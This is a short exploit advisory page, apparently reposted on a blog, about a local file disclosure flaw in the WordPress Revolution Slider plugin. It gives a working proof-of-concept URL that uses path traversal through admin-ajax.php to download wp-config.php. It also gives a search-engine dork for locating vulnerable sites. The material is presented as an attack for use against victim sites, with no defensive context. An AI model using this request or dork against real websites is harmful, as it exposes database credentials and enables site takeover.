Full title | WordPress Revolution Slider Local File Disclosure Vulnerability |
Date add | 27-01-2015 |
Category | web applications |
Platform | php |
Risk |
Security Risk High
|
Description:
WordPress Revolution Slider plugin suffers from a local file disclosure vulnerability. Note that this finding houses site-specific data.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
| [+] Title: Wordpress slider reolusion local file download [+] Date: 2015-01-25 [+] Author: JOK3R [+] Vendor Homepage: https://wordpress.org/plugins/patch-for-revolution-slider/ [+] Tested on: windows 7 / firefox , kali linux / firefox [+] Vulnerable Files: /plugins/revolution-slider/ [+} Dork : "Index of" /wp-content/plugins/revolution-slider/ ### POC: http://victim/wp-admin/admin-ajax.php?action=revolution-slider_show_image&img=../wp-config.php ### Demo: |
No comments:
Post a Comment